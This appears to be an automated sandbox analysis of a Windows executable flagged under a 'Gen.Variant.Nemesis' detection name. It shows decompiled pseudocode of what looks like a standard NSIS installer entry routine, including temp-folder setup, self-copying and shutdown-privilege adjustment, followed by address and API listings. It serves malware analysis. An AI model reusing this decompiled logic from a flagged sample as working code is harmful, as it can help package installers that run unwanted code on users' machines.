47->62 64 40399b-4039a1 48->64 65 403b6c-403b7a call 403c25 OleUninitialize 48->65 51->46 51->52 52->46 56 4038d0-4038d4 53->56 57 4038d6-4038d8 53->57 54->53 60 403881-403889 54->60 56->57 63 4038f9-403906 call 406668 56->63 57->41 58->32 66 403890 60->66 67 40388b-40388e 60->67 62->48 62->65 63->37 69 4039a7-4039ba call 405f64 64->69 70 403a48-403a4f call 403d17 64->70 79 403b91-403b97 65->79 80 403b7c-403b8b call 405cc8 ExitProcess 65->80 66->53 67->53 67->66 84 403a0c-403a19 69->84 85 4039bc-4039f1 69->85 78 403a54-403a57 70->78 78->65 82 403b99-403bae GetCurrentProcess OpenProcessToken 79->82 83 403c0f-403c17 79->83 89 403bb0-403bd9 LookupPrivilegeValueW AdjustTokenPrivileges 82->89 90 403bdf-403bed call 406a35 82->90 92 403c19 83->92 93 403c1c-403c1f ExitProcess 83->93 86 403a1b-403a29 call 40603f 84->86 87 403a5c-403a70 call 405c33 lstrcatW 84->87 91 4039f3-4039f7 85->91 86->65 103 403a2f-403a45 call 406668 * 2 86->103 106 403a72-403a78 lstrcatW 87->106 107 403a7d-403a97 lstrcatW lstrcmpiW 87->107 89->90 104 403bfb-403c06 ExitWindowsEx 90->104 105 403bef-403bf9 90->105 97 403a00-403a08 91->97 98 4039f9-4039fe 91->98 92->93 97->91 102 403a0a 97->102 98->97 98->102 102->84 103->70 104->83 111 403c08-403c0a call 40140b 104->111 105->104 105->111 106->107 108 403b6a 107->108 109 403a9d-403aa0 107->109 108->65 112 403aa2-403aa7 call 405b99 109->112 113 403aa9 call 405c16 109->113 111->83 121 403aae-403abe SetCurrentDirectoryW 112->121 113->121 123 403ac0-403ac6 call 406668 121->123 124 403acb-403af7 call 406668 121->124 123->124 128 403afc-403b17 call 4066a5 DeleteFileW 124->128 131 403b57-403b61 128->131 132 403b19-403b29 CopyFileW 128->132 131->128 134 403b63-403b65 call 406428 131->134 132->131 133 403b2b-403b4b call 406428 call 4066a5 call 405c4b 132->133 133->131 142 403b4d-403b54 CloseHandle 133->142 134->108 142->131
                                                                        C-Code - Quality: 79%
                                                                        			_entry_() {
                                                                        				WCHAR* _v8;
                                                                        				signed int _v12;
                                                                        				void* _v16;
                                                                        				signed int _v20;
                                                                        				int _v24;
                                                                        				int _v28;
                                                                        				struct _TOKEN_PRIVILEGES _v40;
                                                                        				signed char _v42;
                                                                        				int _v44;
                                                                        				signed int _v48;
                                                                        				intOrPtr _v278;
                                                                        				signed short _v310;
                                                                        				struct _OSVERSIONINFOW _v324;
                                                                        				struct _SHFILEINFOW _v1016;
                                                                        				intOrPtr* _t88;
                                                                        				WCHAR* _t92;
                                                                        				char* _t94;
                                                                        				void _t97;
                                                                        				void* _t116;
                                                                        				WCHAR* _t118;
                                                                        				signed int _t120;
                                                                        				intOrPtr* _t124;
                                                                        				void* _t138;
                                                                        				void* _t144;
                                                                        				void* _t149;
                                                                        				void* _t153;
                                                                        				void* _t158;
                                                                        				signed int _t168;
                                                                        				void* _t171;
                                                                        				void* _t176;
                                                                        				intOrPtr _t178;
                                                                        				intOrPtr _t179;
                                                                        				intOrPtr* _t180;
                                                                        				int _t189;
                                                                        				void* _t190;
                                                                        				void* _t199;
                                                                        				signed int _t205;
                                                                        				signed int _t210;
                                                                        				signed int _t215;
                                                                        				signed int _t217;
                                                                        				int* _t219;
                                                                        				signed int _t227;
                                                                        				signed int _t230;
                                                                        				CHAR* _t232;
                                                                        				char* _t233;
                                                                        				signed int _t234;
                                                                        				WCHAR* _t235;
                                                                        				void* _t251;
                                                                        
                                                                        				_t217 = 0x20;
                                                                        				_t189 = 0;
                                                                        				_v24 = 0;
                                                                        				_v8 = L"Error writing temporary file. Make sure your temp folder is valid.";
                                                                        				_v20 = 0;
                                                                        				SetErrorMode(0x8001); // executed
                                                                        				_v324.szCSDVersion = 0;
                                                                        				_v48 = 0;
                                                                        				_v44 = 0;
                                                                        				_v324.dwOSVersionInfoSize = 0x11c;
                                                                        				if(GetVersionExW( &_v324) == 0) {
                                                                        					_v324.dwOSVersionInfoSize = 0x114;
                                                                        					GetVersionExW( &_v324);
                                                                        					asm("sbb eax, eax");
                                                                        					_v42 = 4;
                                                                        					_v48 =  !( ~(_v324.szCSDVersion - 0x53)) & _v278 + 0xffffffd0;
                                                                        				}
                                                                        				if(_v324.dwMajorVersion < 0xa) {
                                                                        					_v310 = _v310 & 0x00000000;
                                                                        				}
                                                                        				 *0x42a318 = _v324.dwBuildNumber;
                                                                        				 *0x42a31c = (_v324.dwMajorVersion & 0x0000ffff | _v324.dwMinorVersion & 0x000000ff) << 0x00000010 | _v48 & 0x0000ffff | _v42 & 0x000000ff;
                                                                        				if( *0x42a31e != 0x600) {
                                                                        					_t180 = E00406A35(_t189);
                                                                        					if(_t180 != _t189) {
                                                                        						 *_t180(0xc00);
                                                                        					}
                                                                        				}
                                                                        				_t232 = "UXTHEME";
                                                                        				do {
                                                                        					E004069C5(_t232); // executed
                                                                        					_t232 =  &(_t232[lstrlenA(_t232) + 1]);
                                                                        				} while ( *_t232 != 0);
                                                                        				E00406A35(0xb);
                                                                        				 *0x42a264 = E00406A35(9);
                                                                        				_t88 = E00406A35(7);
                                                                        				if(_t88 != _t189) {
                                                                        					_t88 =  *_t88(0x1e);
                                                                        					if(_t88 != 0) {
                                                                        						 *0x42a31c =  *0x42a31c | 0x00000080;
                                                                        					}
                                                                        				}
                                                                        				__imp__#17();
                                                                        				__imp__OleInitialize(_t189); // executed
                                                                        				 *0x42a320 = _t88;
                                                                        				SHGetFileInfoW(0x421708, _t189,  &_v1016, 0x2b4, _t189); // executed
                                                                        				E00406668(0x429260, L"NSIS Error");
                                                                        				_t92 = GetCommandLineW();
                                                                        				_t233 = L"\"C:\\Users\\engineer\\Desktop\\SecuriteInfo.com.Gen.Variant.Nemesis.6939.7902.exe\" ";
                                                                        				E00406668(_t233, _t92);
                                                                        				_t94 = _t233;
                                                                        				_t234 = 0x22;
                                                                        				 *0x42a260 = 0x400000;
                                                                        				_t251 = L"\"C:\\Users\\engineer\\Desktop\\SecuriteInfo.com.Gen.Variant.Nemesis.6939.7902.exe\" " - _t234; // 0x22
                                                                        				if(_t251 == 0) {
                                                                        					_t217 = _t234;
                                                                        					_t94 =  &M00435002;
                                                                        				}
                                                                        				_t199 = CharNextW(E00405F64(_t94, _t217));
                                                                        				_v16 = _t199;
                                                                        				while(1) {
                                                                        					_t97 =  *_t199;
                                                                        					_t252 = _t97 - _t189;
                                                                        					if(_t97 == _t189) {
                                                                        						break;
                                                                        					}
                                                                        					_t210 = 0x20;
                                                                        					__eflags = _t97 - _t210;
                                                                        					if(_t97 != _t210) {
                                                                        						L17:
                                                                        						__eflags =  *_t199 - _t234;
                                                                        						_v12 = _t210;
                                                                        						if( *_t199 == _t234) {
                                                                        							_v12 = _t234;
                                                                        							_t199 = _t199 + 2;
                                                                        							__eflags = _t199;
                                                                        						}
                                                                        						__eflags =  *_t199 - 0x2f;
                                                                        						if( *_t199 != 0x2f) {
                                                                        							L32:
                                                                        							_t199 = E00405F64(_t199, _v12);
                                                                        							__eflags =  *_t199 - _t234;
                                                                        							if(__eflags == 0) {
                                                                        								_t199 = _t199 + 2;
                                                                        								__eflags = _t199;
                                                                        							}
                                                                        							continue;
                                                                        						} else {
                                                                        							_t199 = _t199 + 2;
                                                                        							__eflags =  *_t199 - 0x53;
                                                                        							if( *_t199 != 0x53) {
                                                                        								L24:
                                                                        								asm("cdq");
                                                                        								asm("cdq");
                                                                        								_t215 = L"NCRC" & 0x0000ffff;
                                                                        								asm("cdq");
                                                                        								_t227 = ( *0x40a37e & 0x0000ffff) << 0x00000010 |  *0x40a37c & 0x0000ffff | _t215;
                                                                        								__eflags =  *_t199 - (( *0x40a37a & 0x0000ffff) << 0x00000010 | _t215);
                                                                        								if( *_t199 != (( *0x40a37a & 0x0000ffff) << 0x00000010 | _t215)) {
                                                                        									L29:
                                                                        									asm("cdq");
                                                                        									asm("cdq");
                                                                        									_t210 = L" /D=" & 0x0000ffff;
                                                                        									asm("cdq");
                                                                        									_t230 = ( *0x40a372 & 0x0000ffff) << 0x00000010 |  *0x40a370 & 0x0000ffff | _t210;
                                                                        									__eflags =  *(_t199 - 4) - (( *0x40a36e & 0x0000ffff) << 0x00000010 | _t210);
                                                                        									if( *(_t199 - 4) != (( *0x40a36e & 0x0000ffff) << 0x00000010 | _t210)) {
                                                                        										L31:
                                                                        										_t234 = 0x22;
                                                                        										goto L32;
                                                                        									}
                                                                        									__eflags =  *_t199 - _t230;
                                                                        									if( *_t199 == _t230) {
                                                                        										 *(_t199 - 4) = _t189;
                                                                        										__eflags = _t199;
                                                                        										E00406668(L"C:\\Users\\engineer\\AppData\\Local\\Temp", _t199);
                                                                        										L37:
                                                                        										_t235 = L"C:\\Users\\engineer\\AppData\\Local\\Temp\\";
                                                                        										GetTempPathW(0x400, _t235);
                                                                        										_t116 = E0040360F(_t199, _t252);
                                                                        										_t253 = _t116;
                                                                        										if(_t116 != 0) {
                                                                        											L40:
                                                                        											DeleteFileW(L"1033"); // executed
                                                                        											_t118 = E004030D0(_t255, _v20); // executed
                                                                        											_v8 = _t118;
                                                                        											if(_t118 != _t189) {
                                                                        												L68:
                                                                        												E00403C25();
                                                                        												__imp__OleUninitialize();
                                                                        												if(_v8 == _t189) {
                                                                        													if( *0x42a2f4 == _t189) {
                                                                        														L77:
                                                                        														_t120 =  *0x42a30c;
                                                                        														if(_t120 != 0xffffffff) {
                                                                        															_v24 = _t120;
                                                                        														}
                                                                        														ExitProcess(_v24);
                                                                        													}
                                                                        													if(OpenProcessToken(GetCurrentProcess(), 0x28,  &_v16) != 0) {
                                                                        														LookupPrivilegeValueW(_t189, L"SeShutdownPrivilege",  &(_v40.Privileges));
                                                                        														_v40.PrivilegeCount = 1;
                                                                        														_v28 = 2;
                                                                        														AdjustTokenPrivileges(_v16, _t189,  &_v40, _t189, _t189, _t189);
                                                                        													}
                                                                        													_t124 = E00406A35(4);
                                                                        													if(_t124 == _t189) {
                                                                        														L75:
                                                                        														if(ExitWindowsEx(2, 0x80040002) != 0) {
                                                                        															goto L77;
                                                                        														}
                                                                        														goto L76;
                                                                        													} else {
                                                                        														_push(0x80040002);
                                                                        														_push(0x25);
                                                                        														_push(_t189);
                                                                        														_push(_t189);
                                                                        														_push(_t189);
                                                                        														if( *_t124() == 0) {
                                                                        															L76:
                                                                        															E0040140B(9);
                                                                        															goto L77;
                                                                        														}
                                                                        														goto L75;
                                                                        													}
                                                                        												}
                                                                        												E00405CC8(_v8, 0x200010);
                                                                        												ExitProcess(2);
                                                                        											}
                                                                        											if( *0x42a27c == _t189) {
                                                                        												L51:
                                                                        												 *0x42a30c =  *0x42a30c | 0xffffffff;
                                                                        												_v24 = E00403D17(_t265);
                                                                        												goto L68;
                                                                        											}
                                                                        											_t219 = E00405F64(L"\"C:\\Users\\engineer\\Desktop\\SecuriteInfo.com.Gen.Variant.Nemesis.6939.7902.exe\" ", _t189);
                                                                        											if(_t219 < L"\"C:\\Users\\engineer\\Desktop\\SecuriteInfo.com.Gen.Variant.Nemesis.6939.7902.exe\" ") {
                                                                        												L48:
                                                                        												_t264 = _t219 - L"\"C:\\Users\\engineer\\Desktop\\SecuriteInfo.com.Gen.Variant.Nemesis.6939.7902.exe\" ";
                                                                        												_v8 = L"Error launching installer";
                                                                        												if(_t219 < L"\"C:\\Users\\engineer\\Desktop\\SecuriteInfo.com.Gen.Variant.Nemesis.6939.7902.exe\" ") {
                                                                        													_t190 = E00405C33(__eflags);
                                                                        													lstrcatW(_t235, L"~nsu");
                                                                        													__eflags = _t190;
                                                                        													if(_t190 != 0) {
                                                                        														lstrcatW(_t235, "A");
                                                                        													}
                                                                        													lstrcatW(_t235, L".tmp");
                                                                        													_t220 = L"C:\\Users\\engineer\\Desktop";
                                                                        													_t138 = lstrcmpiW(_t235, L"C:\\Users\\engineer\\Desktop");
                                                                        													__eflags = _t138;
                                                                        													if(_t138 == 0) {
                                                                        														L67:
                                                                        														_t189 = 0;
                                                                        														__eflags = 0;
                                                                        														goto L68;
                                                                        													} else {
                                                                        														__eflags = _t190;
                                                                        														_push(_t235);
                                                                        														if(_t190 == 0) {
                                                                        															E00405C16();
                                                                        														} else {
                                                                        															E00405B99();
                                                                        														}
                                                                        														SetCurrentDirectoryW(_t235);
                                                                        														__eflags = L"C:\\Users\\engineer\\AppData\\Local\\Temp"; // 0x43
                                                                        														if(__eflags == 0) {
                                                                        															E00406668(L"C:\\Users\\engineer\\AppData\\Local\\Temp", _t220);
                                                                        														}
                                                                        														E00406668(0x42b000, _v16);
                                                                        														_t202 = "A" & 0x0000ffff;
                                                                        														_t144 = ( *0x40a316 & 0x0000ffff) << 0x00000010 | "A" & 0x0000ffff;
                                                                        														__eflags = _t144;
                                                                        														_v12 = 0x1a;
                                                                        														 *0x42b800 = _t144;
                                                                        														do {
                                                                        															E004066A5(0, 0x420f08, _t235, 0x420f08,  *((intOrPtr*)( *0x42a270 + 0x120)));
                                                                        															DeleteFileW(0x420f08);
                                                                        															__eflags = _v8;
                                                                        															if(_v8 != 0) {
                                                                        																_t149 = CopyFileW(L"C:\\Users\\engineer\\Desktop\\SecuriteInfo.com.Gen.Variant.Nemesis.6939.7902.exe", 0x420f08, 1);
                                                                        																__eflags = _t149;
                                                                        																if(_t149 != 0) {
                                                                        																	E00406428(_t202, 0x420f08, 0);
                                                                        																	E004066A5(0, 0x420f08, _t235, 0x420f08,  *((intOrPtr*)( *0x42a270 + 0x124)));
                                                                        																	_t153 = E00405C4B(0x420f08);
                                                                        																	__eflags = _t153;
                                                                        																	if(_t153 != 0) {
                                                                        																		CloseHandle(_t153);
                                                                        																		_v8 = 0;
                                                                        																	}
                                                                        																}
                                                                        															}
                                                                        															 *0x42b800 =  *0x42b800 + 1;
                                                                        															_t61 =  &_v12;
                                                                        															 *_t61 = _v12 - 1;
                                                                        															__eflags =  *_t61;
                                                                        														} while ( *_t61 != 0);
                                                                        														E00406428(_t202, _t235, 0);
                                                                        														goto L67;
                                                                        													}
                                                                        												}
                                                                        												 *_t219 = _t189;
                                                                        												_t222 =  &(_t219[2]);
                                                                        												_t158 = E0040603F(_t264,  &(_t219[2]));
                                                                        												_t265 = _t158;
                                                                        												if(_t158 == 0) {
                                                                        													goto L68;
                                                                        												}
                                                                        												E00406668(L"C:\\Users\\engineer\\AppData\\Local\\Temp", _t222);
                                                                        												E00406668(L"C:\\Users\\engineer\\AppData\\Local\\Temp", _t222);
                                                                        												_v8 = _t189;
                                                                        												goto L51;
                                                                        											}
                                                                        											asm("cdq");
                                                                        											asm("cdq");
                                                                        											asm("cdq");
                                                                        											_t205 = ( *0x40a33a & 0x0000ffff) << 0x00000010 | L" _?=" & 0x0000ffff;
                                                                        											_t168 = ( *0x40a33e & 0x0000ffff) << 0x00000010 |  *0x40a33c & 0x0000ffff | (_t210 << 0x00000020 |  *0x40a33e & 0x0000ffff) << 0x10;
                                                                        											while( *_t219 != _t205 || _t219[1] != _t168) {
                                                                        												_t219 = _t219;
                                                                        												if(_t219 >= L"\"C:\\Users\\engineer\\Desktop\\SecuriteInfo.com.Gen.Variant.Nemesis.6939.7902.exe\" ") {
                                                                        													continue;
                                                                        												}
                                                                        												break;
                                                                        											}
                                                                        											_t189 = 0;
                                                                        											goto L48;
                                                                        										}
                                                                        										GetWindowsDirectoryW(_t235, 0x3fb);
                                                                        										lstrcatW(_t235, L"\\Temp");
                                                                        										_t171 = E0040360F(_t199, _t253);
                                                                        										_t254 = _t171;
                                                                        										if(_t171 != 0) {
                                                                        											goto L40;
                                                                        										}
                                                                        										GetTempPathW(0x3fc, _t235);
                                                                        										lstrcatW(_t235, L"Low");
                                                                        										SetEnvironmentVariableW(L"TEMP", _t235);
                                                                        										SetEnvironmentVariableW(L"TMP", _t235);
                                                                        										_t176 = E0040360F(_t199, _t254);
                                                                        										_t255 = _t176;
                                                                        										if(_t176 == 0) {
                                                                        											goto L68;
                                                                        										}
                                                                        										goto L40;
                                                                        									}
                                                                        									goto L31;
                                                                        								}
                                                                        								__eflags =  *((intOrPtr*)(_t199 + 4)) - _t227;
                                                                        								if( *((intOrPtr*)(_t199 + 4)) != _t227) {
                                                                        									goto L29;
                                                                        								}
                                                                        								_t178 =  *((intOrPtr*)(_t199 + 8));
                                                                        								__eflags = _t178 - 0x20;
                                                                        								if(_t178 == 0x20) {
                                                                        									L28:
                                                                        									_t36 =  &_v20;
                                                                        									 *_t36 = _v20 | 0x00000004;
                                                                        									__eflags =  *_t36;
                                                                        									goto L29;
                                                                        								}
                                                                        								__eflags = _t178 - _t189;
                                                                        								if(_t178 != _t189) {
                                                                        									goto L29;
                                                                        								}
                                                                        								goto L28;
                                                                        							}
                                                                        							_t179 =  *((intOrPtr*)(_t199 + 2));
                                                                        							__eflags = _t179 - _t210;
                                                                        							if(_t179 == _t210) {
                                                                        								L23:
                                                                        								 *0x42a300 = 1;
                                                                        								goto L24;
                                                                        							}
                                                                        							__eflags = _t179 - _t189;
                                                                        							if(_t179 != _t189) {
                                                                        								goto L24;
                                                                        							}
                                                                        							goto L23;
                                                                        						}
                                                                        					} else {
                                                                        						goto L16;
                                                                        					}
                                                                        					do {
                                                                        						L16:
                                                                        						_t199 = _t199 + 2;
                                                                        						__eflags =  *_t199 - _t210;
                                                                        					} while ( *_t199 == _t210);
                                                                        					goto L17;
                                                                        				}
                                                                        				goto L37;
                                                                        			}



















































                                                                        0x0040364e
                                                                        0x0040364f
                                                                        0x00403656
                                                                        0x00403659
                                                                        0x00403660
                                                                        0x00403663
                                                                        0x00403676
                                                                        0x0040367c
                                                                        0x0040367f
                                                                        0x00403682
                                                                        0x00403690
                                                                        0x00403698
                                                                        0x004036a3
                                                                        0x004036bc
                                                                        0x004036be
                                                                        0x004036c6
                                                                        0x004036c6
                                                                        0x004036d1
                                                                        0x004036d3
                                                                        0x004036d3
                                                                        0x004036e8
                                                                        0x0040370d
                                                                        0x0040371b
                                                                        0x0040371e
                                                                        0x00403725
                                                                        0x0040372c
                                                                        0x0040372c
                                                                        0x00403725
                                                                        0x0040372e
                                                                        0x00403733
                                                                        0x00403734
                                                                        0x00403740
                                                                        0x00403744
                                                                        0x0040374b
                                                                        0x00403759
                                                                        0x0040375e
                                                                        0x00403765
                                                                        0x00403769
                                                                        0x0040376d
                                                                        0x0040376f
                                                                        0x0040376f
                                                                        0x0040376d
                                                                        0x00403776
                                                                        0x0040377d
                                                                        0x00403783
                                                                        0x0040379b
                                                                        0x004037ab
                                                                        0x004037b0
                                                                        0x004037b6
                                                                        0x004037bd
                                                                        0x004037c4
                                                                        0x004037c6
                                                                        0x004037c7
                                                                        0x004037d1
                                                                        0x004037d8
                                                                        0x004037da
                                                                        0x004037dc
                                                                        0x004037dc
                                                                        0x004037ef
                                                                        0x004037f1
                                                                        0x004038eb
                                                                        0x004038eb
                                                                        0x004038ee
                                                                        0x004038f1
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x004037fb
                                                                        0x004037fc
                                                                        0x004037ff
                                                                        0x00403808
                                                                        0x00403808
                                                                        0x0040380b
                                                                        0x0040380e
                                                                        0x00403811
                                                                        0x00403814
                                                                        0x00403814
                                                                        0x00403814
                                                                        0x00403815
                                                                        0x00403819
                                                                        0x004038d9
                                                                        0x004038e2
                                                                        0x004038e4
                                                                        0x004038e7
                                                                        0x004038ea
                                                                        0x004038ea
                                                                        0x004038ea
                                                                        0x00000000
                                                                        0x0040381f
                                                                        0x00403820
                                                                        0x00403821
                                                                        0x00403825
                                                                        0x0040383f
                                                                        0x00403846
                                                                        0x00403859
                                                                        0x0040385a
                                                                        0x0040386f
                                                                        0x00403874
                                                                        0x00403876
                                                                        0x00403878
                                                                        0x00403894
                                                                        0x0040389b
                                                                        0x004038ae
                                                                        0x004038af
                                                                        0x004038c4
                                                                        0x004038ca
                                                                        0x004038cc
                                                                        0x004038ce
                                                                        0x004038d6
                                                                        0x004038d8
                                                                        0x00000000
                                                                        0x004038d8
                                                                        0x004038d2
                                                                        0x004038d4
                                                                        0x004038f9
                                                                        0x004038fd
                                                                        0x00403906
                                                                        0x0040390b
                                                                        0x00403911
                                                                        0x0040391c
                                                                        0x0040391e
                                                                        0x00403923
                                                                        0x00403925
                                                                        0x0040397d
                                                                        0x00403982
                                                                        0x0040398b
                                                                        0x00403992
                                                                        0x00403995
                                                                        0x00403b6c
                                                                        0x00403b6c
                                                                        0x00403b71
                                                                        0x00403b7a
                                                                        0x00403b97
                                                                        0x00403c0f
                                                                        0x00403c0f
                                                                        0x00403c17
                                                                        0x00403c19
                                                                        0x00403c19
                                                                        0x00403c1f
                                                                        0x00403c1f
                                                                        0x00403bae
                                                                        0x00403bba
                                                                        0x00403bcb
                                                                        0x00403bd2
                                                                        0x00403bd9
                                                                        0x00403bd9
                                                                        0x00403be1
                                                                        0x00403bed
                                                                        0x00403bfb
                                                                        0x00403c06
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00403bef
                                                                        0x00403bef
                                                                        0x00403bf0
                                                                        0x00403bf2
                                                                        0x00403bf3
                                                                        0x00403bf4
                                                                        0x00403bf9
                                                                        0x00403c08
                                                                        0x00403c0a
                                                                        0x00000000
                                                                        0x00403c0a
                                                                        0x00000000
                                                                        0x00403bf9
                                                                        0x00403bed
                                                                        0x00403b84
                                                                        0x00403b8b
                                                                        0x00403b8b
                                                                        0x004039a1
                                                                        0x00403a48
                                                                        0x00403a48
                                                                        0x00403a54
                                                                        0x00000000
                                                                        0x00403a54
                                                                        0x004039b2
                                                                        0x004039ba
                                                                        0x00403a0c
                                                                        0x00403a0c
                                                                        0x00403a12
                                                                        0x00403a19
                                                                        0x00403a67
                                                                        0x00403a69
                                                                        0x00403a6e
                                                                        0x00403a70
                                                                        0x00403a78
                                                                        0x00403a78
                                                                        0x00403a83
                                                                        0x00403a88
                                                                        0x00403a8f
                                                                        0x00403a95
                                                                        0x00403a97
                                                                        0x00403b6a
                                                                        0x00403b6a
                                                                        0x00403b6a
                                                                        0x00000000
                                                                        0x00403a9d
                                                                        0x00403a9d
                                                                        0x00403a9f
                                                                        0x00403aa0
                                                                        0x00403aa9
                                                                        0x00403aa2
                                                                        0x00403aa2
                                                                        0x00403aa2
                                                                        0x00403aaf
                                                                        0x00403ab7
                                                                        0x00403abe
                                                                        0x00403ac6
                                                                        0x00403ac6
                                                                        0x00403ad3
                                                                        0x00403adf
                                                                        0x00403ae9
                                                                        0x00403ae9
                                                                        0x00403aeb
                                                                        0x00403af2
                                                                        0x00403afc
                                                                        0x00403b08
                                                                        0x00403b0e
                                                                        0x00403b14
                                                                        0x00403b17
                                                                        0x00403b21
                                                                        0x00403b27
                                                                        0x00403b29
                                                                        0x00403b2d
                                                                        0x00403b3e
                                                                        0x00403b44
                                                                        0x00403b49
                                                                        0x00403b4b
                                                                        0x00403b4e
                                                                        0x00403b54
                                                                        0x00403b54
                                                                        0x00403b4b
                                                                        0x00403b29
                                                                        0x00403b57
                                                                        0x00403b5e
                                                                        0x00403b5e
                                                                        0x00403b5e
                                                                        0x00403b5e
                                                                        0x00403b65
                                                                        0x00000000
                                                                        0x00403b65
                                                                        0x00403a97
                                                                        0x00403a1b
                                                                        0x00403a1e
                                                                        0x00403a22
                                                                        0x00403a27
                                                                        0x00403a29
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00403a35
                                                                        0x00403a40
                                                                        0x00403a45
                                                                        0x00000000
                                                                        0x00403a45
                                                                        0x004039c3
                                                                        0x004039db
                                                                        0x004039ec
                                                                        0x004039ed
                                                                        0x004039f1
                                                                        0x004039f3
                                                                        0x00403a01
                                                                        0x00403a08
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00403a08
                                                                        0x00403a0a
                                                                        0x00000000
                                                                        0x00403a0a
                                                                        0x0040392d
                                                                        0x00403939
                                                                        0x0040393e
                                                                        0x00403943
                                                                        0x00403945
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x0040394d
                                                                        0x00403955
                                                                        0x00403966
                                                                        0x0040396e
                                                                        0x00403970
                                                                        0x00403975
                                                                        0x00403977
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00403977
                                                                        0x00000000
                                                                        0x004038d4
                                                                        0x0040387d
                                                                        0x0040387f
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00403881
                                                                        0x00403885
                                                                        0x00403889
                                                                        0x00403890
                                                                        0x00403890
                                                                        0x00403890
                                                                        0x00403890
                                                                        0x00000000
                                                                        0x00403890
                                                                        0x0040388b
                                                                        0x0040388e
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x0040388e
                                                                        0x00403827
                                                                        0x0040382b
                                                                        0x0040382e
                                                                        0x00403835
                                                                        0x00403835
                                                                        0x00000000
                                                                        0x00403835
                                                                        0x00403830
                                                                        0x00403833
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00403833
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00403801
                                                                        0x00403801
                                                                        0x00403802
                                                                        0x00403803
                                                                        0x00403803
                                                                        0x00000000
                                                                        0x00403801
                                                                        0x00000000

                                                                        APIs
                                                                        • SetErrorMode.KERNELBASE(00008001), ref: 00403663
                                                                        • GetVersionExW.KERNEL32(?), ref: 0040368C
                                                                        • GetVersionExW.KERNEL32(0000011C), ref: 004036A3
                                                                        • lstrlenA.KERNEL32(UXTHEME,UXTHEME), ref: 0040373A
                                                                        • #17.COMCTL32(00000007,00000009,0000000B), ref: 00403776
                                                                        • OleInitialize.OLE32(00000000), ref: 0040377D
                                                                        • SHGetFileInfoW.SHELL32(00421708,00000000,?,000002B4,00000000), ref: 0040379B
                                                                        • GetCommandLineW.KERNEL32(00429260,NSIS Error), ref: 004037B0
                                                                        • CharNextW.USER32(00000000,"C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.6939.7902.exe" ,00000020,"C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.6939.7902.exe" ,00000000), ref: 004037E9
                                                                        • GetTempPathW.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\,00000000,?), ref: 0040391C
                                                                        • GetWindowsDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB), ref: 0040392D
                                                                        • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp), ref: 00403939
                                                                        • GetTempPathW.KERNEL32(000003FC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,\Temp), ref: 0040394D
                                                                        • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,Low), ref: 00403955
                                                                        • SetEnvironmentVariableW.KERNEL32(TEMP,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,Low), ref: 00403966
                                                                        • SetEnvironmentVariableW.KERNEL32(TMP,C:\Users\user\AppData\Local\Temp\), ref: 0040396E
                                                                        • DeleteFileW.KERNELBASE(1033), ref: 00403982
                                                                        • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,~nsu), ref: 00403A69
                                                                        • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,0040A328), ref: 00403A78
                                                                          • Part of subcall function 00405C16: CreateDirectoryW.KERNELBASE(?,00000000,00403633,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403923), ref: 00405C1C
                                                                        • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,.tmp), ref: 00403A83
                                                                        • lstrcmpiW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\Desktop,C:\Users\user\AppData\Local\Temp\,.tmp,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.6939.7902.exe" ,00000000,?), ref: 00403A8F
                                                                        • SetCurrentDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\), ref: 00403AAF
                                                                        • DeleteFileW.KERNEL32(00420F08,00420F08,?,0042B000,?), ref: 00403B0E
                                                                        • CopyFileW.KERNEL32(C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.6939.7902.exe,00420F08,00000001), ref: 00403B21
                                                                        • CloseHandle.KERNEL32(00000000,00420F08,00420F08,?,00420F08,00000000), ref: 00403B4E
                                                                        • OleUninitialize.OLE32(?), ref: 00403B71
                                                                        • ExitProcess.KERNEL32 ref: 00403B8B
                                                                        • GetCurrentProcess.KERNEL32(00000028,?), ref: 00403B9F
                                                                        • OpenProcessToken.ADVAPI32(00000000), ref: 00403BA6
                                                                        • LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00403BBA
                                                                        • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 00403BD9
                                                                        • ExitWindowsEx.USER32(00000002,80040002), ref: 00403BFE
                                                                        • ExitProcess.KERNEL32 ref: 00403C1F
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.882263654.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.882255021.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.882283133.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
